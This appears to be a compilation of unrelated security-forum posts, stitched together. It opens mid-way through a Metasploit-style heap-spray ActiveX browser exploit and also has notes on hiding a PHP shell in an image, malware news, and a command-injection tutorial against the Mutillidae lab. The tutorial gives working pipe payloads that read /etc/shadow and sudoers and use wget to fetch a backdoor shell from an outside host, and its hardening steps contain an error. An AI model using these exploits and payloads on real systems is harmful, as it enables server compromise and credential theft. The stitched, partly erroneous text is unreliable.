return end js = "" if my_target['Spray'] p = payload.encoded js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(my_target.arch)) js_nops = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(my_target.arch)) js = get_spray(my_target, js_code, js_nops) js = heaplib(js, {:noobfu => true}) if datastore['OBFUSCATE'] js = ::Rex::Exploitation::JSObfu.new(js) js.obfuscate end end sploit = get_payload(my_target) sploit = sploit.gsub(/"/, "\\\"") html = <<-MYHTML <html> <head> <script> #{js} </script> </head> <body> <object classid='clsid:9E065E4A-BD9D-4547-8F90-985DC62A5591' id='obj' /></object> <script> obj.SetSource("","","","","#{sploit}"); </script> </body> </html> MYHTML html = html.gsub(/^\t\t/, '') print_status("Sending html") send_response(cli, html, {'Content-Type'=>'text/html'}) end end

Codul PHP(Shell-ul) este inserat in comment-ul imaginii. Deoarece daca respectivul cod PHP ar fi inserat direct in imagine, headerul ar fi corupt, lucru ce va face ca uploadarea sa esueze. Punand codul in comment-ul imaginii va face ca interpretatorul PHP sa vada acel executabil PHP.

Dynamic Analysis of PDF Shellcode Description: In this video you will learn how to analysis one dynamic malware so the shellcode extracted from a target PDF attack. The shellcode has been compiled into a functional PE binary so that we can readily examine its behavior. SpiderLabs Anterior Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Dynamic Analysis of PDF Shellcode on Vimeo

Debugging PDF Shellcode Description: In this video you will learn how to debugging shell code extracted from a targeted PDF attack for reverse engineering he is using OllyDbg software. The shellcode has been compiled into a functional PE binary. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Debugging PDF Shellcode on Vimeo

Description: Fast and tiny CMS Wordpress Security scanner to find vulnerable plugins installed and to give related exploits details. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

Description: This and more videos in: Blog de Omar You can download the software Stake LC5 and the rainbow tables in: Blog de Omar and El Palomo | Facebook Follow me: @ELPalomo_Blog The video shows the following procedures: How to Windows saves the passwords: LM hash / NTLM Hash How to get the password via PWDUMP How to work the Rainbow Tables Cracking the password with Stake LC5 via Rainbow Tables Versión en español: Cracking Password Windows Con Rainbow Tables - Español Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source:

As attacks keep improving, we need to improve our protection methods too. Helping us improve is Ambush HIPS, a new and dramatically more flexible host intrusion prevention system able to act on virtually any behavior. Ambush is an open source, behavior-based host intrusion prevention system (HIPS), that monitors virtually everything a process does on a Windows operating system. It can monitor those functions; it can see how malware acts no matter what it does, and it can tell when your processes do things differently from normal programs, even if the result is the same. The Ambush HIPS works in a client server architecture. The client has to be run on a Windows machine (32-bit and 64-bit) and the server can be run on a *NIX system, that uses a bitnami rubystack appliance, that can also be run on a Windows machine with the VM Player. On *NIX machines it would need the Ruby 1.9 or JRuby-1.6.5.1 along with openssl. Ambush works with the following understanding that to see your files, execute commands, maintain control of your system, hide, steal information, or do anything else, attackers’ code needs to call Windows functions. So to avoid your antivirus or intrusion detection systems, attackers change the packing or obfuscation to change how the malware looks, but it calls the same functions to do the same things. Ambush can monitor those functions; it can see how malware acts no matter what it does, and it can tell when your processes do things differently from normal programs, even if the result is the same. Ambush HIPS also forward alerts to an alert aggregator/event correlator, like Splunk or Arcsight. Since this project is currently under development and testing, lot many features will be added/fixed. It needs your help with all of that! Please do submit your bug reports/feature additions to the Ambush Bugtracker located here. Download Ambush HIPS here. Sursa: PenTestIT — Your source for Information Security Related information!

ESET Smart Security 6. Nu prea e intreg la "minte" uneori, dar isi face treaba excelent, mancand putine resurse. Acum parerile sunt impartite, cum a fost intotdeauna treaba legata de solutiile AV. Fiecare are propriul lui preferat in materie de anti-virus.

Malware attack targets German internet users | Naked Security by Graham Cluley on July 26, 2012 Do you remember the spammed-out malware attack which appeared to be targeting French speakers last week with its offer of très sexy photos from a Gallic admirer? Well, now it seems that German internet users are in the targets of cybercriminals. A malware campaign has been sent out, seemingly just to email addresses ending in ".de", claiming that photos of the recipient can be found in the attached file. Those with a curious disposition might find it hard to resist clicking on the attachment to find out more. Here are just a small selection of the examples we have intercepted in our spam traps: You'll notice that the emails have forged "from:" addresses. Presumably the masterminds of the malware campaign are hoping that some users might be more likely to open emails that pretend to come from LinkedIn.. .. or Habbo Hotel. Attached to each of the emails is a file, called DCIM.htm, which is detected by Sophos products as Troj/Redir-P. The file (which users are encouraged by the email to open using Internet Explorer) attempts to contact a Russian website known to contain malware. Remember to always be suspicious of unsolicited messages, even if they arrive in your native language. Sursa: Malware attack targets German internet users | Naked Security

Black Hat – SexyDefense, maximizing the home-field advantage | Naked Security by Irene Michlin on July 26, 2012 I'm attending the BlackHat this year, and one of the most interesting and controversial talks so far was "SexyDefense - Maximizing the home-field advantage" by Iftach Ian Amit. Ian opened with some very good advice about the defensive mindset: there is no final, optimal, best-practice security strategy. It's: a) always evolving specific to your organisation Security compliance testing by itself does not improve organisational security. It's what the organisation does after the compliance test or penetration test that matters. The theme of the conference as a whole this year seems to be that the concept of a "perimeter defense" is dead. There will always be gaps and breaches. We need to concentrate on detecting them as soon as possible and responding the best way possible. Our focus should be on finding the next gap in security instead of looking for someone to blame for the previous gap. Another useful piece of advice is to log everything everywhere, and filter later. Storage is cheap, missing an early sign of attack is expensive. Some early warnings will be well outside any IDS system like the volume of calls to support, unusual sales enquiries or odd PC behavior reported by your staff. Ian, similarly to keynote speaker Shawn Henry (ex-FBI), draws analogies between real-world defense and cyber-defense, and suggests taking the fight to the bad guys' territory. One example was taking the DarkComet tool, infecting it with itself, and uploading it back to a popular "toolz" website. Everyone who downloaded that version of the tool, was 0wned. Another example was modifying a dodgy packer to leave a distinct signature. The only caveat was: get legal advice appropriate to your country before attempting that at home. I have many more issues with this. I've tried to discuss them with Ian after the talk, but his approach is "we work in a tainted space, it's naive to think we can do that wearing white gloves". But let's consider the classic principle of anti-virus companies: "Don't modify malware, to do that is as bad as creating your own new malware". Is it really naive? We follow this principle even internally, never mind uploading this modified malware anywhere else. Before we consider moral issues, let's consider usefullness of this approach. Why would someone download a new version of your malware? I'd have thought that you would need to provide some useful new functionality. Ian reassures me that's not the case. Most bad guys would just grab the latest version even if there isn't anything new in it. This doesn't eliminate the really clever adversaries. They build their own tools or are not willing to trust random code. Yet we can get the script kiddies while still wearing white gloves. So, you've got some percentage of low-skill hackers who will use your modified tools. You're safe from these attacks. What about all the other attacks: 1. High-skill hackers who will use other tools against you 2. Low-skill hackers who get their tools elsewhere If you play that game, how long before you actually write some new attack capabilities into your malware tools, to increase their adoption or to raise your street cred in the group you are infiltrating? This slope is much more slippery than a simple "don't modify even one byte of malware" rule. All of the above assumes that the modification went to plan, and you've done exactly what you wanted to do to this malware. As a developer, I can tell you it's not a good assumption to make with any piece of software, and I don't see why malware would be different. Do you really want a new virus in the wild on your conscience? Even if your tools can detect it, what about everybody else's tools? So now we are back to the moral side of the story. Going back to our comparison to the physical world, this talk seems to suggest we make some guns with a known ballistic signature and give them to criminals. In the words of multiple James Bond villains: what could possibly go wrong? Sursa: Black Hat – SexyDefense, maximizing the home-field advantage | Naked Security

July 26, 2012 By Black EDMS Electronic Data Masking Standard Edition, a high performance data masking solution for PCI/PII compliance. Through a free download users are able mask up to 10 columns of sensitive data across all non-production instances of a single enterprise application. Data masking has emerged as a best practice to protect non-production data because unlike encryption, masking is able to support the entire application development lifecycle. Data masking removes personally identifiable information such as a person’s name and account, credit card, or social security number, and transforms it into contextually accurate data. Download EDMS: EDMS – EDMS Sursa: EDMS is Tool for data masking — PenTestIT

Description: This is an interesting exercise I had given to my students for the SecurityTube Python Scripting Course (SPSE). The problem statement was roughly the following - Create a multi-threaded TCP SYN scanner using Scapy, Threading and Queue modules in Python. Quick note: 1. This code is to illustrate use of multithreading in Python 2. Performance of the scanner solely depends on the probe / detection capability of scapy. The code outsources everything to scapy 3. Filtered ports etc. are not taken care of for now. Only SYN-ACKs are considered Code Snippet on Pastebin: [Python] Multi-Threaded SYN Scanner using Scapy, Threading and Queue - Pastebin.com (was a quick cut-paste from the editor - check formatting before running) If you are looking for details on our SPSE course and how to register, please visit this link: SecurityTube Python Scripting Expert ? SecurityTube Trainings Enjoy and please do leave your comments behind! Sursa: Simple Multi-Threaded Tcp Syn Scanner Using Scapy, Threading And Queue Modules In Python

Microsoft: Update Java or kill it | ZDNet Summary: Microsoft is offering advice on how to protect yourself from Java-based malware. The instructions are simple: either update it, disable it, or just uninstall it completely. By Emil Protalinski for Zero Day | July 26, 2012 -- 15:06 GMT (08:06 PDT) Microsoft has decided is enough is enough: Java-based malware sees no end and it's time to do something about it. The software giant points to two type-confusion vulnerabilities (CVE-2012-0507 and CVE-2012-1723) that have been very actively exploited in recent months. Redmond thus wants you to do one of three things: update Java, disable it, or uninstall it. First, some background. Type-confusion vulnerabilities are effective because they lead to a Sandbox compromise for Java. They occur when the type safety check in Java Runtime Environment (JRE) fails to verify wrong types supplied to instructions working with different types. If the classes' type safety is broken, you can access some methods that are not supposed to be opened to processes outside of the class. As a result, Microsoft's first recommendation is to update your Java installation. To check the version of JRE your browser is running, head over to java.com/en/download/installed.jsp and get the latest version. I did that in Chrome and IE9. Google's browser informed me that "Java is required to display some elements on this page." Excellent, so I don't have Java installed in Chrome, which I use the most frequently. Next, Microsoft's browser gave me the following error: I know I have Java installed, but I'm guessing this error is happening because it's the 64-bit version. I wasn't suprised Oracle still hasn't fixed Sun's version check code. Next up, Microsoft has offered guidance for those who don't want to keep Java updated. The software giant points to Apple's instructions for the Mac (support.apple.com/kb/HT5241) and details its own instructions for Windows: If you prefer, you may also just disable your current Java Plug-in temporarily to prevent being vulnerable to Java-based threats. To do this, on Windows systems, go to "Control Panel" and select "Java". When the "Java Runtime Environment Settings" dialog box appears, select the "Java" tab. From there, click the "View" button. You can just uncheck the "Enabled" check box to disable that installation from being used by Java Plug-in and Java Web Start. Even though you can disable Java Plug-in on a per-browser basis, this method is most effective in disabling Java Plug-in system-wise. Last but not least, Microsoft recommended you uninstall Java if you don't use it. Instructions from Oracle are available at java.com/en/download/uninstall.jsp. After seeing Microsoft's warning, I chose to kill Java with fire. I removed it completely from my Windows 7 box. Mind you, I'll probably be doing some programming in a few months, but I'll just reinstall Java then. "So, by following some simple steps, you can protect your machine from this malware infection by choosing to update, disable or uninstall," a Microsoft spokesperson said in a statement. "All of these will be effective for preventing currently prevalent Java based malware; it's just up to you to choose the right method to protect yourself based on your needs and situation." Sursa: Microsoft: Update Java or kill it | ZDNet

Mac malware spies on infected users through video and audio capture | Naked Security by Graham Cluley on July 26, 2012 After further analysis, more information has emerged about the Morcut Mac OS X malware (also known as "Crisis" by some anti-virus products) which was discovered this week. Clearly OSX/Morcut-A was created with spying in mind, as its code includes hooks to control/monitor the following operations: mouse coordinates instant messengers (for instance, Skype [including call data], Adium and MSN Messenger) location internal webcam clipboard contents key presses running applications web URLs screenshots internal microphone calendar data & alerts device information address book contents In short, if this malware managed to infect your Mac computer it could learn an awful lot about you, and potentially steal information which could read your private messages and conversations, and open your email and other online accounts. Fortunately, we haven't seen Morcut in the wild. At the moment the threat is low. However, the complexity of the malware is yet another indication that malware on the Mac is becoming more serious - and designed to make money at your expense. If you haven't already done so, you really should run anti-virus software on your Mac. The software in the Mac App Store is (unfortunately) not up to the job, as it doesn't include the real-time component essential to scan every file (and thus every potential threat) as it is opened. Fortunately, if you are a home user, there is award-winning free anti-virus software for your Mac available. And yes, it works on Mountain Lion too. By the way, if you're curious about where the name "Crisis" came from, it's a name which appears inside the malware's code. As far as we can tell, the author appears to have wanted his malware to be called "Crisis". However, there is some history and tradition in the computer security industry of not stroking the malware creator's ego and deliberately ignoring their suggestion as to how their Trojan horse or virus should be named. We're delighted not to call the malware "Crisis", but OSX/Morcut instead. Sursa: Mac malware spies on infected users through video and audio capture | Naked Security

Command injection or also known as Remote Code Execution in terms of web exploitation, can be possible to a certain website accepts added strings of characters or arguments; the inputs are used as arguments for executing the command in the website’s hosting server. Thus making it another common web application vulnerability that allows an attacker to execute arbitrary codes in the system. In fact it is included in OWASP (Open Web Application Security Project) Top Ten Web Application Security Risks. Let us take a look at the image shown above which happens to be our target and example for today. It shows a simple user-interface for querying the DNS (Domain Name System) by inserting any Internet Protocol address or host name at the dialog box. Now let us look at the sample vulnerable code for command execution or injection: <?php if (isset($_POST["dns-lookup-php-submit-button"])){ try{ if ($targethost_validated){ echo ‘<p class=”report-header”>Results for ‘.$lTargetHostText.’<p>’; echo ‘<pre class=”report-header” style=”text-align:left;”>’; echo shell_exec(“nslookup ” . $targethost); echo ‘<pre>’; $LogHandler->writeToLog($conn, “Executed operating system command: nslookup ” . $lTargetHostText); }else{ echo ‘<script>document.getElementById(“id-bad-cred-tr”).style.display=”"</script>’; }// end if ($targethost_validated){ }catch(Exception $e){ echo $CustomErrorHandler->FormatError($e, “Input: ” . $targethost); }// end try }// end if (isset($_POST)) ?> I got the code above from the dns-lookup.php file of a free and open source vulnerable web application that I have been playing at which is Mutillidae from Irongeek.com and developed by Adrian “Irongeek” Crenshaw and Jeremy Druin. Mutillidae is web application for you to practice your Web Fu skills like sql injection, cross site scripting, html injection, javascript injection, clickjacking, local file inclusion, authentication bypass methods, remote code execution and many more. It is packed with vulnerable pages, hints and walk-through in case you don’t have an idea on how the exploit is done. I decided to use this web application so that you could also try out this tutorial or writeup. Okay, now let’s try to query for a random IP address which is 74.125.31.102. Did you guys notice that there is a code echo shell_exec() function on the script? If you look closely on the code, you should be able to see shell_exec(“nslookup ” . $targethost); on it. With nslookup command, a user can to look up an IP address of a domain or host on a network. Linux uses “&&” to link commands and “;” as a command separator. Now, let’s try the command echo but I prefer using the | (vertical bar) instead of && to check if it is vulnerable to command injection: [I]| echo ‘hello’[/I] In this case the target is vulnerable to command injection or execution. It’s just like issuing the command nslookup | echo ‘hello’ in the terminal. But what’s the reason why I prefer using the pipeline or vertical bar rather than ‘&&’? Well this image should enlighten you up: The vertical bar tells the shell to provide the output of the command on the right, this is called a pipeline while the ‘&&’ links the commands nslookup and uname -a which outputs the DNS of the IP address and the kernel version of the host. In some cases, && just doesn’t work and sometimes you need to put a value on before the pipleline just like: 1 | echo ‘Infosec Institute’. But so much for that, let’s continue on gathering some information on the webserver. And because we used the command uname -a, we were able to identify that information on the system like it runs on Linux kernel release 3.0.0-16, network node hostname is projectX, the operating system is GNU/Linux, etc. . Now let’s probe or check what Linux distribution this server is: | cat /etc/issue ?| cat /etc/*-release ?| cat /etc/lsb-release | cat /etc/redhat-release [B](for rpm based distros)[/B] Hey it’s BackBox Linux which is one of my favorite penetration testing distros based on Ubuntu. Time to figure out where are we now and list all the directories: [I]| pwd ; ls -la[/I] As an information gatherer, it is our task to check what services are running and which service belongs to a specific user privilege: | ?ps aux | ps -ef | top | cat /etc/service Attackers may also check if there are any settings that are mis-configured or some logs to check if anything can be exploited or if there are vulnerable plugins attached. Below are other commands for specific directories and are used in probing the web server: | cat /etc/environment | cat /proc/self/environ | cat /etc/shadow | cat /etc/sudoers | cat /etc/group | cat ?/etc/security/group | cat /etc/security/passwd | cat /etc/security/user | cat /etc/security/environ | cat /etc/security/limits | cat /usr/lib/security/mkuser.default | cat /var/log/messages | cat var/log/mysql.log | cat /var/log/user.log | cat /var/www/logs/error_log ?| cat /etc/syslog.conf | cat /etc/chttp.conf | cat /etc/lighttpd.conf | cat /etc/cups/cupsd.conf | cat /etc/inetd.conf | cat /etc/apache2/apache2.conf | cat/var/log/apache2/error.log | cat /etc/my.conf | cat /etc/httpd/conf/httpd.conf | cat /opt/lampp/etc/httpd.conf | ls -aRl /etc/ | awk ‘$1 ~ /^.*r.*/ ?| cat /etc/resolv.conf | cat /etc/sysconfig/network | cat /etc/networks ?| /sbin/ifconfig -a | cat /etc/network/interfaces ?| s -alh /var/spool/cron | ls -al /etc/ | grep cron | ls -al /etc/cron* | cat /etc/cron* | cat /etc/at.allow | cat /etc/at.deny | cat /etc/cron.allow | cat /etc/cron.deny | cat /etc/crontab | cat /etc/anacrontab | cat /var/spool/cron/crontabs/root With most attackers interested in backdooring a Linux webserver, they need to probe first ? try to how files can be uploaded so that they can deliver the finishing touch. ? | find / -name wget | find / -name nc* | find / -name netcat* | find / -name tftp* | find / -name ftp I think I’ll try wget then, so I just need to try and download a text file from a certain URL I found in Google Search Engine. [I]| wget http://whateversite.com/hackers/resources/digital%20rebels/articles/unixhck.txt[/I] Wget command allows non-interactive download of files from the Web and it supports HTTP, HTTPS, and FTP protocols. ?Let’s try to check if the file is really uploaded by typing these commands: | ls -la | cat unixhck.txt reat, now I have downloaded a textfile of Sir Hackalot’s tutorial about Unix Hacking to the web server. Now let’s try to upload a backdoor shell in a text file. In this example I will be using a r57 Backdoor Shell from another source. ? | wget http://whateversite.com/backdoor.txt Now let’s make a php backdoor shell by copying the contents of backdoor.txt to newfilename.php (I’ll just make a new backdoor.php file). ? | cp backdoor.txt backdoor.php ?Now time to check the backdoor shell. Most backdoor shells have shell_exec() function too that’s why you can execute commands on it easier. Because it allows you command execution then attackers may also use it for running their malicious scripts like IRC Bots, Scanners, mass ssh scanners, bruteforcers, etc. For example: perl udp.pl ./a 124.104 perl wetwork.pl perl timthumbexploiter.pl python bot.py Tips for Preventing Remote Code Execution: Disable the shell_exec () function if you plan not to use such function to prevent ?arbitrary code execution or if you just wan’t to get rid of this security risk. But if you really need the shell_exec () function for a certain php file or form, then use escapeshellarg () function which escapes shell metacharacters and escapeshellcmd() function which is used to escape single arguments to shell functions coming from user input. Both of these functions escapes potentially dangerous characters in the string. Adding a WAF or web application firewall could also help although I cannot guarantee 100 percent security since some WAF’s can still be bypassed but at least there are some preventions. It also depends on the lockdown. But I prefer using ModSecurity for hardening your Apache Web Server in Linux/Unix because it is an open source web application firewall which helps you to detect and prevent common attacks against web applications like SQL Injection, XSS, Command Injection or Execution, etc. And so I decided to share a simple guide for installing ModSecurity just in case you wanna try it out. Setting up ModSecurity in your Web Sever running Ubuntu and Debian Based Distros: Type this in your terminal emulator : ?sudo apt-get install libapache2-modsecurity This should install new pagkages for libapache2-modsecurity and modsecurity-crs Create a directory for ModSecurity in the Apache2 folder: sudo mkdir /etc/apache2/modsecurity Create a configuration file for ModSecurity, which will be loaded by Apache, using this command: ? sudo nano /etc/apache2/conf.d/modsecurity.conf ? Add the following code, save and exit. (Ctrl +X, Type Y for to agree or say yes to the changes of the file, then press Enter to save) ## /etc/init.d/apache2/conf.d/modsecurity.conf Include modsecurity/*.conf Set the ModSecurity rules using these two commands: ?cd /etc/apache2/modsecurity sudo cp -R /usr/share/modsecurity-crs/base_rules/* . Modify and correct the line in the modsecurity_crs_20_protocol_violations.conf file: sudo nano /etc/apache2/modsecurity/modsecurity_crs_20_protocol_violations.conf Replace this line: SecRule REQBODY_ERROR “!@eq 0? with this one: SecRule REQBODY_PROCESSOR_ERROR “!@eq 0? Then Save and exit. Restart now the Apache web server. sudo service mysql start To verify if the ModSecurity module is loaded in the Apache type this command: cat /var/log/apache2/error.log | grep modsecurity The output should look like this if configured properly ModSecurity for Apache/2.6.0 (URL) configured. Additional Reading Materials: Php Endangers - Remote Code Execution Sursa: InfoSec Resources – Command Execution